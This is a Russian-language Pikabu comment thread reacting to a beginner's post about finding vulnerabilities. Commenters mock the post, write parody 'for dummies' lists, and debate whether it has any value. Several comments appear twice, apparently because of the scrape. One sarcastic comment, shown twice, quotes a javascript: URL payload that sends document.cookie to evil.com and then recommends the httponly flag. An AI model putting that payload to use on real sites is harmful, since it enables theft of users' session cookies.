Поиск уязвимостей. Пособие для Чайников.
В продолжение поста http://pikabu.ru/story/_2960491 pdf версия в комментариях
Пикабу взломано. Теперь пользователи умеют сохранять посты, не нажимая на кнопку сохранения!!1!
раскрыть ветку (29)
Я уже представил себе рекламу с дурацкой гифкой хацкера с анимацией в 2 кадра. И твой текст с припиской "ШОК! Узнайте о методе прямо сейчас!".
раскрыть ветку (3)
просто кулхекер открыл для себя self-xss.
Могу еще посоветовать ему создать пост "если вы введете в адресную строку javascript:new Image().src='http://evil.com/?sniff=%27%20atob%28document.cookie%29%3B то ваши куки уйдут на evil.com, а это - серьезная уязвимость!!!"
Хотя вот тут я бы действительно посоветовал админам пикабу выставлять httponly флаг на PHPSESS
Могу еще посоветовать ему создать пост "если вы введете в адресную строку javascript:new Image().src='http://evil.com/?sniff=%27%20atob%28document.cookie%29%3B то ваши куки уйдут на evil.com, а это - серьезная уязвимость!!!"
Хотя вот тут я бы действительно посоветовал админам пикабу выставлять httponly флаг на PHPSESS
раскрыть ветку (20)
раскрыть ветку (19)
раскрыть ветку (15)
и ребят, я понимаю, что вы в этом котле не варитесь, отсюда все минусы.
Но постараюсь привести несколько примеров, чтобы вы поняли, почему все так плохо с постом:
1) Футбол для чайников.
Чтобы начать играть в футбол в жизни, купите бутсы, завяжите их белыми шнурками, купите fifa2015 и сыграйте тренировочный матч.
2) Экономика для чайников.
Чтобы стать успешным экономистом, выберите любую валюту и представьте, как бы вы хотели поменять все ваши деньги.
3) Программирование для чайников.
Скачайте visual studio, запустите setup.exe
Ваша первая программа успешно запущена.
4) Химия для чайников.
Положите чай в чашку с кипятком.
Сахар по вкусу
5) Вождение авто для чайников.
Купите на рынке полкило бубликов.
Рулите и издавайте вр-вр-вр-вр звук.
6) Медицина для чайников.
Купите клизму.
Аккуратно извлеките ее из упаковки.
Наберите в нее воду и весело прыскайте в глаза прохожим.
Если вас после этого потянуло заняться футболом, медициной, химией или пойти сдать на права - значит вы счастливый 1%, поздравляю.
Но постараюсь привести несколько примеров, чтобы вы поняли, почему все так плохо с постом:
1) Футбол для чайников.
Чтобы начать играть в футбол в жизни, купите бутсы, завяжите их белыми шнурками, купите fifa2015 и сыграйте тренировочный матч.
2) Экономика для чайников.
Чтобы стать успешным экономистом, выберите любую валюту и представьте, как бы вы хотели поменять все ваши деньги.
3) Программирование для чайников.
Скачайте visual studio, запустите setup.exe
Ваша первая программа успешно запущена.
4) Химия для чайников.
Положите чай в чашку с кипятком.
Сахар по вкусу
5) Вождение авто для чайников.
Купите на рынке полкило бубликов.
Рулите и издавайте вр-вр-вр-вр звук.
6) Медицина для чайников.
Купите клизму.
Аккуратно извлеките ее из упаковки.
Наберите в нее воду и весело прыскайте в глаза прохожим.
Если вас после этого потянуло заняться футболом, медициной, химией или пойти сдать на права - значит вы счастливый 1%, поздравляю.
раскрыть ветку (2)
но этот пост не учебник для чайников. он просто ради интереса написан.
ладно, я понял твою мыслю, но и ты мою пойми - посты такого плана разнообразят пикабу, не все же котики да сиськи?
ладно, я понял твою мыслю, но и ты мою пойми - посты такого плана разнообразят пикабу, не все же котики да сиськи?
раскрыть ветку (1)
может меня смутило название "Поиск уязвимостей. Пособие для Чайников" в таком случае.
Я сам за разнообразие.
Поищу тогда интересные уязвимости, повлекшие за собой серьезные атаки
Я сам за разнообразие.
Поищу тогда интересные уязвимости, повлекшие за собой серьезные атаки
раскрыть ветку (11)
чем полезен пост?
например тем что он вызывает любопытство. и 1% из прочитавших заинтересуются темой.
я считаю вот такие конкретные примеры без развернутой теории на 100 страниц для этого подходят лучше всего. кто заинтересовался - погуглит дополнительно че за пост гет и аякс/аджакс
например тем что он вызывает любопытство. и 1% из прочитавших заинтересуются темой.
я считаю вот такие конкретные примеры без развернутой теории на 100 страниц для этого подходят лучше всего. кто заинтересовался - погуглит дополнительно че за пост гет и аякс/аджакс
ещё комментарии
и зачем им это? Кому надо - узнают про ajax сами, кому надо - узнают про hpp сами, про CSRF узнают тоже сами.
Тут же - просто высер. Автор даже не понимает, о чем он пишет.
Поменять параметр - что в этом такого?
Он что, получил доступ к чужому контенту? Прочитал чужую переписку? Где тут уязвимости хотя бы? К чему вообще пост?
Тут же - просто высер. Автор даже не понимает, о чем он пишет.
Поменять параметр - что в этом такого?
Он что, получил доступ к чужому контенту? Прочитал чужую переписку? Где тут уязвимости хотя бы? К чему вообще пост?
раскрыть ветку (9)
ещё комментарии
Какого любопытства? Как у Джонни Ноксвилла и полета на ракете?
У этого 1% любопытства раньше не было.
Сегодня оно им ничего не дало.
Пост - пустышка с точки зрения КБ.
У этого 1% любопытства раньше не было.
Сегодня оно им ничего не дало.
Пост - пустышка с точки зрения КБ.
раскрыть ветку (4)
раскрыть ветку (1)
Вот за это пикабу меня бесит. Сегодня ты пишешь "тут не хабр", а вчера еще писали что "пикабу всему научит". У меня полыхает так, что металл плавить можно!
раскрыть ветку (1)
Если честно, поверхностность знаний - это самая опасная штука в любой сфере.
Объявить себя мегахакером, суперпрограммистом.
В итоге имеем раздутый рынок, реально хороших спецов мало, средние спецы просят больше денег, чем стоят, ламеры выполняют госзаказы за 10 т.р. и всех все устраивает.
Я уже прорекламировал действительно хороший сайт по (преимущественно) веб безопасности, а не "кликни сюда, нажми туда, готово".
Хочется верить, что 1% и туда зайдет.
Объявить себя мегахакером, суперпрограммистом.
В итоге имеем раздутый рынок, реально хороших спецов мало, средние спецы просят больше денег, чем стоят, ламеры выполняют госзаказы за 10 т.р. и всех все устраивает.
Я уже прорекламировал действительно хороший сайт по (преимущественно) веб безопасности, а не "кликни сюда, нажми туда, готово".
Хочется верить, что 1% и туда зайдет.
ещё комментарии
Насколько я понимаю, данный пост это продолжение к предыдущему (о чем указано в заголовке). На другом сайте автор с помощью описанного здесь нашел реальную уязвимость, причем его поблагодарили в денежном эквиваленте, а в данном просто расписал что он делал там на примере пикабу, а не на конкретном сайте, который был уязвим, чтобы не "палить" его. И причем создал этот пост, потому что его попросили.
Почему вас так задел данный пост в связи с вышесказанным? Или вы просто не удосужились перейти по ссылке в описании к посту, раз пишите такие глупости, как "Он что, получил доступ к чужому контенту? Прочитал чужую переписку? Где тут уязвимости хотя бы? К чему вообще пост?"
И если вы так подкованы в данном вопросе, с удовольствием почитал бы ваши интересные посты на данную тематику, с конкретными примерами. Вместо критики подобной выше.
И я не собираюсь разбираться досконально в этом. Но на досуге почитать подобное - за милую душу. А кому-то это дает толчок к дальнейшему развитию. Так что вы не правы, сударь ;)
Почему вас так задел данный пост в связи с вышесказанным? Или вы просто не удосужились перейти по ссылке в описании к посту, раз пишите такие глупости, как "Он что, получил доступ к чужому контенту? Прочитал чужую переписку? Где тут уязвимости хотя бы? К чему вообще пост?"
И если вы так подкованы в данном вопросе, с удовольствием почитал бы ваши интересные посты на данную тематику, с конкретными примерами. Вместо критики подобной выше.
И я не собираюсь разбираться досконально в этом. Но на досуге почитать подобное - за милую душу. А кому-то это дает толчок к дальнейшему развитию. Так что вы не правы, сударь ;)
раскрыть ветку (2)
в другом посте он так же не привел ничего интересного.
конечно, я верю, что он нашел information disclosure, но это не интересно и не захватывающе.
За последнюю пару месяцев есть интересные примеры, но они еще не все закрыты на продакшене.
Но могу накатать просто по взломам последних 10 лет кое-что занятное.
конечно, я верю, что он нашел information disclosure, но это не интересно и не захватывающе.
За последнюю пару месяцев есть интересные примеры, но они еще не все закрыты на продакшене.
Но могу накатать просто по взломам последних 10 лет кое-что занятное.
раскрыть ветку (1)
ещё комментарии
раскрыть ветку (2)
раскрыть ветку (1)
пшшш плюсую как могу требуется поддержка приём пшш заканчиваются плюсы пшш пшшшш не справляюсь пшш окружён пшшш передайте коту что люблю пшш почистите мою историю в браузефвревфывфы пш
раскрыть ветку (2)
у них есть программа поощрения за найденные уязвимости, так что если найду, то обязательно им сообщу ;)
раскрыть ветку (1)
ещё комментарий